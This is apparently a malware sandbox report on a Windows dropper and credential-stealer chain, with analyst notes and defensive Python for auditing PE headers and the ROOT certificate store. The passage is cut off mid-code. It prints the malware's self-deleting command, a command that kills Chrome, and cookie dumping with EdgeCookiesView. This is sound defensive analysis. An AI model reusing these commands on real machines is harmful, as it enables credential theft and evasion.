Source: 25.2.1E1C360C582DF797.exe.4750000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.10000000.11.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@31/50@223/4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01216E5E GetLastError,FormatMessageW, 1_2_01216E5E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E621870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_6E621870
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6286A0 LoadResource,LockResource,SizeofResource, 0_2_6E6286A0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File created: C:\Program Files (x86)\71eza90awf48
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\nsqEF28.tmp
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Command line argument: sfxname 1_2_0122D42A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Command line argument: sfxstime 1_2_0122D42A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Command line argument: STARTDLG 1_2_0122D42A
Source: h1GodtbhC8.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\1607186572092.exe System information queried: HandleInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Note: the statements above are SQLite's own VACUUM and ALTER TABLE helper queries, i.e. evidence that 1E1C360C582DF797.exe embeds the SQLite engine (as needed to read browser history and cookie databases); they are not stealer-specific strings and should not be used as indicators on their own.
Source: h1GodtbhC8.exe Virustotal: Detection: 46%
Source: h1GodtbhC8.exe Metadefender: Detection: 16%
Source: h1GodtbhC8.exe ReversingLabs: Detection: 64%
Source: 1E1C360C582DF797.exe String found in binary or memory: -StartTP
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File read: C:\Users\user\Desktop\h1GodtbhC8.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\h1GodtbhC8.exe 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: unknown Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: unknown Process created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
Source: unknown Process created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe' Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3 Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3 Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Install
Source: Window Recorder Window detected: More than 3 window changes detected
Source: h1GodtbhC8.exe Static file information: File size 4671378 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Source: h1GodtbhC8.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmp
Note: this PDB path, together with the /sjson <file> switch on the 1607186572092.exe and 1607186588295.exe command lines above, matches the NirSoft EdgeCookiesView utility. The browser-credential harvesting in this chain is therefore done with a legitimate, signed-looking viewer tool that writes the cookie list as JSON to the .txt files named on those command lines, which is why the two executables themselves may score low on AV scanners.
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.826855048.00000000026F6000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr
Source: Binary string: C:\Users\Lenny\Documents\nsis-3.01-src\build\urelease\stub_zlib-x86-ansi\stub_zlib.pdb source: aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000024.00000002.639458414.0000000000BDC000.00000002.00020000.sdmp
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Unpacked PE file: 25.2.1E1C360C582DF797.exe.4750000.5.unpack
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Note: the build stamp lies about 50 years ahead of the analysis. The dropped files 1607186572092.exe and 1607186588295.exe are named after Unix millisecond timestamps that decode to 5 Dec 2020, so the TimeDateStamp has been altered or is junk and cannot be used to date the build.
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
File is packed with WinRar
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File created: C:\Program Files (x86)\71eza90awf48\__tmp_rar_sfx_access_check_5371765 Jump to behavior
Note: this is a WinRAR self-extracting archive rather than a runtime packer: setup.exe carries the sfxrar.pdb path and accepts the sfxname / sfxstime / STARTDLG arguments listed earlier, and it extracts aliens.exe into C:\Program Files (x86)\71eza90awf48\ (the __tmp_rar_sfx_access_check file is the SFX stub probing that the target directory is writable).
PE file contains an invalid checksum
Source: 1E1C360C582DF797.exe.4.dr Static PE information: real checksum: 0xe6954 should be:
Source: h1GodtbhC8.exe Static PE information: real checksum: 0x0 should be: 0x47db98
Source: aliens.exe.1.dr Static PE information: real checksum: 0xe6954 should be:
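The two static findings above (a TimeDateStamp decades in the future and a CheckSum field that does not match the file) are cheap to reproduce without a sandbox. The following is an added example, not code from the report or from the sample: it parses the DOS, COFF and optional headers, recomputes the optional-header checksum with the same arithmetic that imagehlp and pefile use, and decodes the timestamp. The `build_minimal_pe` helper constructs a non-executable stand-in file for testing; the 0xBD323864 stamp and the 5 Dec 2020 "analysis time" (taken from the dropped file names) are the only values borrowed from the report.

```python
"""Static triage of a PE header: future compile timestamp and invalid CheckSum.
Added example; not part of the sandbox report or the analysed sample."""
import struct
from datetime import datetime, timezone


def build_minimal_pe(timestamp, checksum, size_of_headers=0x200, body=b"\x90" * 0x200):
    """Constructed stand-in for a PE file (not executable): DOS header, PE signature,
    COFF header, PE32 optional header and some body bytes. Only the fields read
    below carry meaningful values; everything else is zero."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)   # CheckSum sits at +64 in PE32 and PE32+
    header = dos + b"PE\0\0" + coff + bytes(opt)
    return header + b"\0" * (size_of_headers - len(header)) + body


def parse_pe(data):
    """Return (TimeDateStamp, stored CheckSum, file offset of the CheckSum field)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    timestamp = struct.unpack_from("<I", data, e_lfanew + 8)[0]  # COFF header + 4
    opt = e_lfanew + 24                                           # 4-byte sig + 20-byte COFF
    if struct.unpack_from("<H", data, opt)[0] not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    cksum_off = opt + 64
    return timestamp, struct.unpack_from("<I", data, cksum_off)[0], cksum_off


def pe_checksum(data, cksum_off):
    """Recompute the CheckSum: ones'-complement sum of every 32-bit word (the CheckSum
    field itself is skipped), folded to 16 bits, plus the file length."""
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == cksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def decode_timestamp(ts):
    """COFF TimeDateStamp is seconds since the Unix epoch, UTC."""
    d = datetime.fromtimestamp(ts, tz=timezone.utc)
    return d.year, d.month, d.day, d.hour, d.minute, d.second


def audit(data, now_ts):
    """Return the findings a static scanner raises; now_ts is the analysis time (epoch seconds)."""
    ts, stored, off = parse_pe(data)
    findings = []
    if ts == 0 or ts > now_ts:
        y, mo, d, h, mi, s = decode_timestamp(ts)
        findings.append(f"suspicious timestamp 0x{ts:08X} [{y}-{mo:02d}-{d:02d} {h:02d}:{mi:02d}:{s:02d} UTC]")
    real = pe_checksum(data, off)
    if stored != real:
        findings.append(f"invalid checksum: stored 0x{stored:x}, computed 0x{real:x}")
    return findings


if __name__ == "__main__":
    sample = build_minimal_pe(0xBD323864, 0)        # constructed: report's stamp, zero checksum
    for line in audit(sample, now_ts=1607186572):   # 5 Dec 2020, from the dropped file names
        print(line)
```

A zero CheckSum is common in unsigned, non-driver binaries and is not malicious by itself; the combination with an impossible timestamp and a writable or high-entropy .text section is what makes it worth a look. Because the algorithm skips the CheckSum field, writing the computed value back into the header and recomputing yields the same number, which is the property the test below relies on.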
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E65F9A8 push ecx; ret 0_2_6E65F9BB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122E0E4 push eax; ret 1_2_0122E102
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122EBA6 push ecx; ret 1_2_0122EBB9
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10010579 push ecx; ret 4_2_1001058C
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DF034 push E8026DF0h; iretd 21_2_026DF039
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E8680 push eax; ret 21_2_026E869E
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E78B0 push eax; ret 21_2_026E78C4
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E78B0 push eax; ret 21_2_026E78EC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E9FCF push ecx; ret 21_2_026E9FDF
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E88D9A push ecx; ret 21_2_04E88DAD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E8EB91 push ecx; ret 21_2_04E8EBA4
Source: initial sample Static PE information: section name: .text entropy: 6.82101260035

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 4_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D370
Note: all three call chains open \\.\PhysicalDrive%d and issue DeviceIoControl only; none of them contains WriteFile. The same open of PhysicalDrive0 is reported again under "Queries disk information" in the evasion section, so this is at least as consistent with reading disk identity for machine fingerprinting as with a boot-sector write. Check which IOCTL codes are passed before treating it as MBR tampering.
Installs new ROOT certificates
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob Jump to behavior
Note: a certificate written to the machine ROOT store is trusted by Windows and by every application that uses the Windows store (Edge and Chrome included), so any TLS server or signing certificate chained to it will validate silently. The subkey name is the SHA-1 thumbprint of the certificate's DER encoding; search other hosts for that exact value and remove the subkey (or the certificate via certmgr/certutil) during cleanup.
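To verify entries under the ROOT\Certificates key on a host or in an offline SOFTWARE hive, the Blob value has to be decoded: it is a sequence of serialized certificate-store properties, each record being a DWORD property id, a DWORD reserved field (always 1), a DWORD length and the data, where property 32 holds the DER certificate and property 3 its SHA-1. The following is an added example, not code from the report: it parses that layout, checks that the subkey name really is the SHA-1 of the embedded certificate (a renamed key or a swapped blob is itself a finding), and compares every entry against a baseline of expected thumbprints. The byte strings used as certificates are constructed test data, not real certificates; the registry read itself (winreg or a hive parser) is left to the caller.

```python
"""Audit SystemCertificates\ROOT\Certificates entries against a thumbprint baseline.
Added example; the Blob layout is the serialized store-property format used by
the Windows certificate store registry values."""
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 3        # property ids as defined in wincrypt.h
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32            # the DER-encoded certificate itself


def parse_cert_blob(blob):
    """Split a 'Blob' value into {property_id: bytes}. Records are
    <DWORD propid><DWORD reserved=1><DWORD length><length bytes>, back to back."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed record at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    if off != len(blob):
        raise ValueError("trailing bytes after last record")
    return props


def build_cert_blob(der, friendly_name=None):
    """Inverse of parse_cert_blob; only used here to construct test data."""
    def rec(pid, data):
        return struct.pack("<III", pid, 1, len(data)) + data
    out = rec(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest())
    if friendly_name:
        out += rec(CERT_FRIENDLY_NAME_PROP_ID, friendly_name.encode("utf-16-le") + b"\0\0")
    return out + rec(CERT_CERT_PROP_ID, der)


def inspect_entry(key_name, blob):
    """Return (consistent, sha1_hex, sha256_hex, friendly_name) for one <thumbprint> subkey.
    consistent is False when the key name or the stored hash disagrees with SHA-1(DER)."""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("blob carries no certificate (property 32)")
    sha1 = hashlib.sha1(der).hexdigest().upper()
    sha256 = hashlib.sha256(der).hexdigest().upper()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\0")
    stored = props.get(CERT_SHA1_HASH_PROP_ID)
    consistent = key_name.upper() == sha1 and (stored is None or stored.hex().upper() == sha1)
    return consistent, sha1, sha256, name


def audit_root_store(entries, baseline):
    """entries: {subkey name: Blob bytes} read from ROOT\\Certificates;
    baseline: set of SHA-1 thumbprints known to belong on this host.
    Returns {thumbprint: 'baseline' | 'unexpected' | 'inconsistent'}."""
    verdicts = {}
    for key_name, blob in entries.items():
        consistent, sha1, _, _ = inspect_entry(key_name, blob)
        if not consistent:
            verdicts[key_name.upper()] = "inconsistent"
        elif sha1 in baseline:
            verdicts[sha1] = "baseline"
        else:
            verdicts[sha1] = "unexpected"
    return verdicts


# Constructed test data: these byte strings stand in for DER certificates; they are not real.
GOOD_DER = b"constructed-DER-of-a-baseline-root"
ROGUE_DER = b"constructed-DER-of-an-added-root"
GOOD_SHA1 = hashlib.sha1(GOOD_DER).hexdigest().upper()
ROGUE_SHA1 = hashlib.sha1(ROGUE_DER).hexdigest().upper()
SAMPLE_ENTRIES = {
    GOOD_SHA1: build_cert_blob(GOOD_DER, "Baseline Root"),
    ROGUE_SHA1: build_cert_blob(ROGUE_DER),
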